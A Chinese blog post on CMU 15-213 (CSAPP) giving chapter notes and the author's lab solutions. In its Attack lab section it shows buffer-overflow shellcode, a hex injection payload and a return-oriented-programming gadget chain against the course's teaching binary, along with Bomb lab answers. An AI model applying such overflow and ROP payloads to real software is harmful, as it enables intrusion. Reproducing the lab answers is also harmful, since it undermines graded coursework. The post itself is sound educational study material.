<!DOCTYPE html>












  


<html class="theme-next gemini use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222"/>


























  

<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.6.2/css/font-awesome.min.css"/>

<link rel="stylesheet" href="/css/main.css?v=7.0.0"/>


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.0.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.0.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.0.0">


  <link rel="mask-icon" href="/images/logo.svg?v=7.0.0" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Gemini',
    version: '7.0.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="CMU 15-213 被誉为卡耐基梅隆大学计算机系的“神课”，教材是知名的 Computer Systems: A Programmer’s Perspective（CSAPP，中文译名《深入理解计算机系统》，但不知道“深入”是从哪里来的）。其课程号 15213 恰好也是 CMU 的邮政编码。 这门课相当于 x86-64 汇编语言、计算机组成原理、操作系统等课程的大杂烩，起到导论作用，是 CMU">
<meta property="og:type" content="article">
<meta property="og:title" content="CMU 15-213 Introduction to Computer Systems">
<meta property="og:url" content="http://yangdong02.github.io/2020/08/15/CMU-15-213-Introduction-to-Computer-Systems/index.html">
<meta property="og:site_name" content="Distant Yesterday">
<meta property="og:description" content="CMU 15-213 被誉为卡耐基梅隆大学计算机系的“神课”，教材是知名的 Computer Systems: A Programmer’s Perspective（CSAPP，中文译名《深入理解计算机系统》，但不知道“深入”是从哪里来的）。其课程号 15213 恰好也是 CMU 的邮政编码。 这门课相当于 x86-64 汇编语言、计算机组成原理、操作系统等课程的大杂烩，起到导论作用，是 CMU">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-08-15T07:55:44.000Z">
<meta property="article:modified_time" content="2020-08-16T17:04:29.960Z">
<meta property="article:author" content="Distant Yesterday">
<meta property="article:tag" content="计算机系统">
<meta name="twitter:card" content="summary">



  <link rel="alternate" href="/atom.xml" title="Distant Yesterday" type="application/atom+xml"/>




  <link rel="canonical" href="http://yangdong02.github.io/2020/08/15/CMU-15-213-Introduction-to-Computer-Systems/"/>



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>CMU 15-213 Introduction to Computer Systems | Distant Yesterday</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<meta name="generator" content="Hexo 5.4.2"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Distant Yesterday</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">Pause and ponder</p>
      
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section">&lt;i class&#x3D;&quot;menu-item-icon fa fa-fw fa-home&quot;&gt;&lt;&#x2F;i&gt; &lt;br&#x2F;&gt;首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section">&lt;i class&#x3D;&quot;menu-item-icon fa fa-fw fa-user&quot;&gt;&lt;&#x2F;i&gt; &lt;br&#x2F;&gt;关于</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section">&lt;i class&#x3D;&quot;menu-item-icon fa fa-fw fa-tags&quot;&gt;&lt;&#x2F;i&gt; &lt;br&#x2F;&gt;标签</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    

    <a href="/categories/" rel="section">&lt;i class&#x3D;&quot;menu-item-icon fa fa-fw fa-th&quot;&gt;&lt;&#x2F;i&gt; &lt;br&#x2F;&gt;分类</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section">&lt;i class&#x3D;&quot;menu-item-icon fa fa-fw fa-archive&quot;&gt;&lt;&#x2F;i&gt; &lt;br&#x2F;&gt;归档</a>

  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br/>搜索</a>
        </li>
      
    </ul>
  

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yangdong02.github.io/2020/08/15/CMU-15-213-Introduction-to-Computer-Systems/"/>

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Distant Yesterday"/>
      <meta itemprop="description" content=""/>
      <meta itemprop="image" content="/images/avatar.gif"/>
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Distant Yesterday"/>
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">CMU 15-213 Introduction to Computer Systems

              
            
          </h1>
        

        <div class="post-meta">
		  
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2020-08-15 15:55:44" itemprop="dateCreated datePublished" datetime="2020-08-15T15:55:44+08:00">2020-08-15</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2020-08-17 01:04:29" itemprop="dateModified" datetime="2020-08-17T01:04:29+08:00">2020-08-17</time>
              
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/%E5%85%AC%E5%BC%80%E8%AF%BE/" itemprop="url" rel="index"><span itemprop="name">公开课</span></a></span>

                
                
              
            </span>
          
		  
		  
		  
		  
            <span class="post-meta-divider">|</span>
		    <i class="fa fa-wrench"></i>
            博文状态：更新中
          
		  
          
            
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon"
            >
            <i class="fa fa-eye"></i>
             阅读次数： 
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><a target="_blank" rel="noopener" href="http://www.cs.cmu.edu/~213/index.html">CMU 15-213</a> 被誉为卡耐基梅隆大学计算机系的“神课”，教材是知名的 Computer Systems: A Programmer’s Perspective（CSAPP，中文译名《深入理解计算机系统》，但不知道“深入”是从哪里来的）。其课程号 15213 恰好也是 CMU 的邮政编码。</p>
<p>这门课相当于 x86-64 汇编语言、计算机组成原理、操作系统等课程的大杂烩，起到导论作用，是 CMU 计算机大二学生的必修课程。两周刷下来，我感觉这门课最核心的是有趣的实验作业（Lab）。这里我记录一下一些感受和收获。</p>
<span id="more"></span>

<h1 id="课程"><a href="#课程" class="headerlink" title="课程"></a>课程</h1><h2 id="1-2-3-章"><a href="#1-2-3-章" class="headerlink" title="1,2,3 章"></a>1,2,3 章</h2><p>第一章：综述性质，可以读一读。</p>
<p>第二章：除了浮点数原理，剩下的学过 OI 的基本都懂…我反正跳了，做 Data lab 时学就可以了。</p>
<p>第三章是很重要也很有收获的一章，5 节课 + 2 个 lab，可以看到其重要程度。主要是熟悉 C 语言转化来的 x86-64 汇编。</p>
<p>值得一提的首先是寄存器。常见寄存器的名字要知道，如 8 个通用目的寄存器（%rax, %rbx, %rcx, %rdx, %rsi, %rdi, %rbp, %rsp）、%rip 及用处，多看看汇编代码就能记住了。寄存器有 caller saved 和 callee saved 这两种，以及相关的概念。Callee saved 这个思想在异步信号安全中也出现了，还蛮重要。</p>
<p>第二就是条件传送（cmovq 之类的指令），完全打破了我之前的认知。条件传送可以更好地利用流水线，不用承担 if 跳转带来的分支预测错误的惩罚，可谓神器。C++ 的<code>std::max</code> 之类的开 O2 之后的汇编就是条件传送，比手写的快，丝毫不用担心这方面的常数。 Data lab 有一个 $O(1)$ 条指令实现条件的函数感觉可能就是条件传送的思想。</p>
<p>第三是 leaq 之类的指令。编译器用 leaq 进行了各种避免乘以常数的骚操作。</p>
<p>第四就是缓冲区溢出的风险了，做 Attack lab 后深有体会。</p>
<h2 id="5-6-章"><a href="#5-6-章" class="headerlink" title="5,6 章"></a>5,6 章</h2><p>第五章感觉学得也比较无感… 凭 ICPC 竞赛和之前某华为比赛卡常的经验，基本都挺熟悉了。</p>
<p>第六章讲存储器层次结构，阐释了书封面上的“存储器山”，介绍了时间、空间局部性的重要性。讲了高速缓存的原理，以及如何写 cache 友好的矩阵乘法、如何通过分块减少 cache miss 等。配套的 Cache lab 真是大毒瘤！</p>
<h2 id="7-8-9-章"><a href="#7-8-9-章" class="headerlink" title="7,8,9 章"></a>7,8,9 章</h2><p>第七章链接，挺重要、挺有趣的话题，不过就讲了一节课，也没有 lab… 讲了库打桩之类的高科技，但我感觉自己学得不太行，有时间再仔细读读书。</p>
<p>第八章异常控制流，看到了并发编程的冰山一角，感觉全程高能啊！引入了异常、进程、信号的概念，以及 Unix 的标准实现。需要注意信号是不会排队的。</p>
<p>很重要的一点就是信号处理函数要做到“异步信号安全”（async signal safety），以及注意同步问题。异步信号安全是个很强的条件（但是否完全强于线程安全呢？），指的是运行被中断，再次调用时仍然不会出错。例如 printf 就不是异步信号安全的，因为它有公用的缓冲区。可能有人会问给缓冲区加锁是不是就解决问题了？答案是否定的。考虑函数 A 调用了 printf，已经给缓冲区加上了锁；这时信号来了，printf 被中断，转而开始运行信号处理函数 B，如果 B 调用了 printf，B 会发现缓冲区已经上了锁，所以会挂起，等待锁解除；但是只有 B 运行完了，才会继续运行 A 的 printf，B 在等待一个不可能发生的事件，造成了死锁！课程还介绍到了要避免很多非常细微的竞争问题。如在 Shell lab 中，父进程在 fork 前就必须阻塞 SIGCHLD，以免在将子进程加入 jobs 的数据结构之前子进程结束，SIGCHLD 处理函数要从 jobs 数据结构中删除还未被加入的子进程。</p>
<p>非本地跳转，是带着上下文的。很多高级语言的 try… catch… 都是非本地跳转。</p>
<p>第九章虚拟内存，也是非常重要的概念，不过也没感觉多难… 从磁盘读的 miss penalty 特别大，所以用全相连的方式、通过软件和复杂的逻辑进行缓存。地址翻译感觉又是高速缓存的那一套… 感觉多级页表本质上就是 trie 树… 内存映射很有趣，将没有加载的文件以 page fault 的形式载入。fork 后的 copy on write 技术很有用。动态内存分配的话，得益于诸多 ICPC 大模拟的出题人，绝大多数概念都很熟悉了，做 malloc lab 也没感觉多难，甚至都没看课本上参考代码</p>
<h2 id="10-11-12-章"><a href="#10-11-12-章" class="headerlink" title="10,11,12 章"></a>10,11,12 章</h2><p>第十章内容挺少，但还算挺有用。Unix 一切皆文件，但是 Unix I/O 太低级了，不保证能按照要求读/写完。Robust I/O 包很有趣，是线程安全的，在 Proxy lab 很有用。文件描述符表、打开文件表、v-node 表的概念挺重要，这样来看，可以同时打开多个文件，fork 出的子进程的文件描述符表的继承也显得很自然，而重定向 dup2(oldfd, newfd) 函数也变得非常简单。感觉一个重点就是标准 I/O 并不是万能的，尤其在网络编程中不要用。</p>
<p>第十一章，网络编程。之前有用 Python Flask 的经验，而这回用 C 语言来网络编程，更能理解一些底层的东西。IP 协议提供了基本命名方法和（主机间）递送机制（datagram），但丢失重复时不会恢复；UDP 是进程间的不可靠数据报协议，稍稍拓展了 IP；TCP 也建立在 IP 之上，是进程间可靠的全双工连接。要同时能处理多个客户端的请求就需要并发编程了。</p>
<p>客户端： getaddrinfo -&gt; socket -&gt; connect -&gt; rio_writen / rio_readlineb -&gt; close</p>
<p>服务器：getaddrinfo -&gt; socket -&gt; bind -&gt; listen -&gt; accept -&gt; rio_readlineb / rio_writen -&gt; -&gt; close</p>
<p>第十二章，并发编程。有三种方式：基于进程、基于线程和基于 I/O 多路复用，效率逐渐增高，调度难度逐渐增大。主要讲了线程，不同线程有不同的线程 ID、栈空间、PC、条件码、通用目的寄存器等，而全局数据是共享的。共享变量很方便，但可能有同步错误，如 10 个线程都操作 10000 次，每次给开始是 0 的全局变量 cnt 递增 1，则 cnt 最终未必是 100000。</p>
<p>用信号量同步线程非常有趣，有两种操作：P 是如果变量非零，则将其减一后返回，否则阻塞；V 是将变量加一，如果之前有线程被阻塞，则唤醒其中任何一个。给上面提到的 cnt 加锁就很简单了，初始一个信号量 s 是 1，每个线程在 ++cnt 前调用 P(s)，而在之后调用 V(s)。从线程图的角度，如果是二维的，这就是禁止了一个矩形区域。用信号量可以解两个经典互斥访问问题：生产者-消费者问题（可用于预线程化）、读者写者问题（可以在多线程条件下维护数据结构）。</p>
<h1 id="实验"><a href="#实验" class="headerlink" title="实验"></a>实验</h1><p>课上的实验都做了，以下是完成度表：</p>
<table>
<thead>
<tr>
<th>Lab name</th>
<th>Progress</th>
</tr>
</thead>
<tbody><tr>
<td>Data lab</td>
<td>100%</td>
</tr>
<tr>
<td>Bomb lab</td>
<td>100%</td>
</tr>
<tr>
<td>Attack lab</td>
<td>95%</td>
</tr>
<tr>
<td>Cache lab</td>
<td>91%</td>
</tr>
<tr>
<td>Shell lab</td>
<td>100%</td>
</tr>
<tr>
<td>Malloc lab</td>
<td>98%</td>
</tr>
<tr>
<td>Proxy lab</td>
<td>100%</td>
</tr>
</tbody></table>
<h2 id="Data-lab"><a href="#Data-lab" class="headerlink" title="Data lab"></a>Data lab</h2><p>第一次作业，非常有趣，感觉非常人类智慧啊！这里分享三个好题的解法，不一定是最优的。logicalNeg 貌似有 O(1) 次操作的方法…orz</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment"> * conditional - same as x ? y : z </span></span><br><span class="line"><span class="comment"> *   Example: conditional(2,4,5) = 4</span></span><br><span class="line"><span class="comment"> *   Legal ops: ! ~ &amp; ^ | + &lt;&lt; &gt;&gt;</span></span><br><span class="line"><span class="comment"> *   Max ops: 16</span></span><br><span class="line"><span class="comment"> *   Rating: 3</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">conditional</span><span class="params">(<span class="type">int</span> x, <span class="type">int</span> y, <span class="type">int</span> z)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> nx = !x, ns = nx &lt;&lt; <span class="number">4</span>;</span><br><span class="line">    <span class="type">int</span> nnx = !nx, nns = nnx &lt;&lt; <span class="number">4</span>;</span><br><span class="line">    <span class="keyword">return</span> ((y &lt;&lt; ns) &lt;&lt; ns) | ((z &lt;&lt; nns) &lt;&lt; nns);</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment"> * logicalNeg - implement the ! operator, using all of </span></span><br><span class="line"><span class="comment"> *              the legal operators except !</span></span><br><span class="line"><span class="comment"> *   Examples: logicalNeg(3) = 0, logicalNeg(0) = 1</span></span><br><span class="line"><span class="comment"> *   Legal ops: ~ &amp; ^ | + &lt;&lt; &gt;&gt;</span></span><br><span class="line"><span class="comment"> *   Max ops: 12</span></span><br><span class="line"><span class="comment"> *   Rating: 4 </span></span><br><span class="line"><span class="comment"> *   O(log log U) operations. </span></span><br><span class="line"><span class="comment"> *   Binary lifting to make most sig bit move toward least sig bit.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">logicalNeg</span><span class="params">(<span class="type">int</span> x)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> f1 = x  | (x  &gt;&gt; <span class="number">1</span>);</span><br><span class="line">    <span class="type">int</span> f2 = f1 | (f1 &gt;&gt; <span class="number">2</span>);</span><br><span class="line">    <span class="type">int</span> f3 = f2 | (f2 &gt;&gt; <span class="number">4</span>);</span><br><span class="line">    <span class="type">int</span> f4 = f3 | (f3 &gt;&gt; <span class="number">8</span>);</span><br><span class="line">    <span class="type">int</span> f5 = f4 | (f4 &gt;&gt; <span class="number">16</span>);</span><br><span class="line">    <span class="keyword">return</span> ~f5 &amp; <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">/* howManyBits - return the minimum number of bits required to represent x in</span></span><br><span class="line"><span class="comment"> *             two&#x27;s complement</span></span><br><span class="line"><span class="comment"> *  Examples: howManyBits(12) = 5</span></span><br><span class="line"><span class="comment"> *            howManyBits(298) = 10</span></span><br><span class="line"><span class="comment"> *            howManyBits(-5) = 4</span></span><br><span class="line"><span class="comment"> *            howManyBits(0)  = 1</span></span><br><span class="line"><span class="comment"> *            howManyBits(-1) = 1</span></span><br><span class="line"><span class="comment"> *            howManyBits(0x80000000) = 32</span></span><br><span class="line"><span class="comment"> *  Legal ops: ! ~ &amp; ^ | + &lt;&lt; &gt;&gt;</span></span><br><span class="line"><span class="comment"> *  Max ops: 90</span></span><br><span class="line"><span class="comment"> *  Rating: 4</span></span><br><span class="line"><span class="comment"> *  Solution with O(log log U) operations. (binary lifting)</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">howManyBits</span><span class="params">(<span class="type">int</span> x)</span> </span>&#123;</span><br><span class="line">	<span class="comment">/* Make it positive */</span></span><br><span class="line">    <span class="type">int</span> neg = x &gt;&gt; <span class="number">31</span> &amp; <span class="number">1</span>;</span><br><span class="line">	<span class="type">int</span> pos = !neg;</span><br><span class="line">	<span class="type">int</span> ce = pos &lt;&lt; <span class="number">4</span>;</span><br><span class="line">	<span class="type">int</span> ans = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">	<span class="comment">/* Make it fit the form of 000...00111..1 */</span></span><br><span class="line">    x = x ^ ((~<span class="number">0</span> &lt;&lt; ce) &lt;&lt; ce);</span><br><span class="line">    x = x | (x &gt;&gt; <span class="number">1</span>);</span><br><span class="line">    x = x | (x &gt;&gt; <span class="number">2</span>);</span><br><span class="line">    x = x | (x &gt;&gt; <span class="number">4</span>);</span><br><span class="line">    x = x | (x &gt;&gt; <span class="number">8</span>);</span><br><span class="line">    x = x | (x &gt;&gt; <span class="number">16</span>);</span><br><span class="line"></span><br><span class="line">	<span class="comment">/* To get proper index */</span></span><br><span class="line">	x &lt;&lt;= <span class="number">1</span>;</span><br><span class="line">	</span><br><span class="line">	<span class="comment">/* Binary lifting to get the answer */</span></span><br><span class="line">    ans = ans + ((x &gt;&gt; (ans + <span class="number">16</span>) &amp; <span class="number">1</span>) &lt;&lt; <span class="number">4</span>);</span><br><span class="line">    ans = ans + ((x &gt;&gt; (ans + <span class="number">8</span>) &amp; <span class="number">1</span>)  &lt;&lt; <span class="number">3</span>);</span><br><span class="line">    ans = ans + ((x &gt;&gt; (ans + <span class="number">4</span>) &amp; <span class="number">1</span>)  &lt;&lt; <span class="number">2</span>);</span><br><span class="line">    ans = ans + ((x &gt;&gt; (ans + <span class="number">2</span>) &amp; <span class="number">1</span>)  &lt;&lt; <span class="number">1</span>);</span><br><span class="line">    ans = ans + ((x &gt;&gt; (ans + <span class="number">1</span>) &amp; <span class="number">1</span>));</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> ans + <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="Bomb-lab"><a href="#Bomb-lab" class="headerlink" title="Bomb lab"></a>Bomb lab</h2><p>耐心读源码就胜利了… 最后一个题是链表排序可还行。由于时间原因没做隐藏关。贴个当时写的题解：</p>
<ul>
<li>Phase 1: The program is comparing two strings. The answer string is already there. Use print instruction in gdb to show that.</li>
<li>Phase 2: The program asks for 6 integers. After reading the assembly code, we can find the answer is a geometric progression with ratio 2 and starting number 1.</li>
<li>Phase 3: 2 ints. The first should be in some range, and with each of them, we can find corresponding second number in the code. The original program may be just a switch statement.</li>
<li>Phase 4: 2 unsigned ints. The second one is 0, while the first one is &gt;= 0 and &lt;= 0xe and satisfies that func4(first, 0, first) == 0. func4 is a bit complicated with recursion, so I just bruteforced all of the 15 choices to find the correct value.</li>
<li>Phase 5: string S of length 6. OK if <code>&#39;&#39;.join(&quot;maduiersnfotvbylSo&quot;[ord(ch) &amp; 0xf] for ch in S) == &quot;flyers&quot;</code></li>
<li>Phase 6: Input 6 integers, which should be a permutation of 1,2,3,4,5,6. The program firstly transforms it with <code>lambda x: 7-x</code>. Then a new array of pointers is generated. ptr[i] = (address of the node with ID i in the linked list). The node structure is presumably the following, and we need to sort the list in decreasing order of val.</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">node1</span> &#123;</span></span><br><span class="line">    <span class="type">int</span> val, id;</span><br><span class="line">    node1 *nxt;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<h2 id="Attack-lab"><a href="#Attack-lab" class="headerlink" title="Attack lab"></a>Attack lab</h2><p>利用缓冲区溢出，冲掉栈中记录的函数返回地址，从而让程序运行我们想要的函数。</p>
<p>hack1-1：直接冲掉返回地址就行。</p>
<p>hack1-2：要让它以指定的参数调用函数。写出如下的汇编，变成机器代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">movl $0x59b997fa,%edi # set cookie</span><br><span class="line">pushq $0x4017ec # call function touch2</span><br><span class="line">ret</span><br><span class="line"># overwrite return address: 0x5561dc78</span><br><span class="line"># hex: bf fa 97 b9 59 68 ec 17 40 00 c3 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 78 dc 61 55 00 00 00 00</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>hack1-3：要让它以指定字符串调用。这个挺难，挺卡机器代码长度的。我用的书如下汇编：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">movabsq $0x6166373939623935, %rdi</span><br><span class="line">movq %rdi, -0x400(%rsp)</span><br><span class="line">movl $0, -0x3f8(%rsp)</span><br><span class="line">movl $0x5561d8a8,%edi</span><br><span class="line">pushq $0x4018fa # address of touch3</span><br><span class="line">ret</span><br><span class="line"></span><br><span class="line"># (0x5561dca0) 0x4  bytes overwrite address -&gt; ???</span><br><span class="line"># 2. When getbuf return: %rsp=0x5561dca0 -&gt; 0x5561dca8</span><br><span class="line"># (0x5561dc78) 0x28 bytes for instruction</span><br><span class="line"># 1. getbuf: %rsp=0x5561dc78</span><br><span class="line"># 3. Instruction write the following string:</span><br><span class="line"># (0x5561d8a8) 0x9  bytes for string, 0x59b997fa -&gt; 35 39 62 39 39 37 66 61 00</span><br><span class="line"></span><br><span class="line"># WRITE below %rsp to save instructions. Is it valid????</span><br></pre></td></tr></table></figure>

<p>hack2-1：Return-oriented programming，真是高级的 hack 方式！</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># Stack:    0x401976, 0x9, 0x402044, 0xf4f4f4f4f4f4f4f4 &lt;repeats 82 times&gt;</span><br><span class="line">#           0x401976, 0x0, 0x9, 0x0, 0x402044, 0x0, 0xf4f4f4f4 &lt;repeats 74 times&gt;</span><br><span class="line"># Change to:0x4019ab,cookie=0x59b997fa,0x4019c5,0x4017ec</span><br><span class="line"># &lt;0x4019ab addval_219+4&gt;: 58 90: popq %rax</span><br><span class="line"># &lt;0x4019c5 setval_426+2&gt;: 48 89 c7: movq %rax,%rdi</span><br><span class="line"># &lt;0x4017ec touch2&gt;</span><br></pre></td></tr></table></figure>



<h2 id="Cache-lab"><a href="#Cache-lab" class="headerlink" title="Cache lab"></a>Cache lab</h2><p>对于我来说最难的 lab？得分 48.4 / 53</p>
<p>Part A 小模拟，很容易。</p>
<p>Part B，优化矩阵转置的 Cache miss。每个 cache 块可以存 8 个 int。显然要分块，但是由于只有 1 相连，会有很痛苦的冲突问题… </p>
<p>61 x 67 由于要求比较低，直接按 16 分块就过了…</p>
<p>32 x 32 要求也不太高，按 8 分块比 300 稍多一点。优化下对角线，就满分了。</p>
<p>64 x 64 是真心不会。按 4 分块 + 优化对角线，仍然 1701 miss… 得分 3.4 / 8</p>
<h2 id="Shell-lab"><a href="#Shell-lab" class="headerlink" title="Shell lab"></a>Shell lab</h2><p>需要综合考虑各种信号处理，挺烧脑，但是不算太难。</p>
<h2 id="Malloc-lab"><a href="#Malloc-lab" class="headerlink" title="Malloc lab"></a>Malloc lab</h2><p>2 的乘方的 segregated free list + Best fit search 即可 93/100。</p>
<p>特判了 binary1-bal.rep, binary2-bal.rep 就 98/100 了（逃）</p>
<p>所以这为啥是大家一致认为的最难的 lab 啊？？？</p>
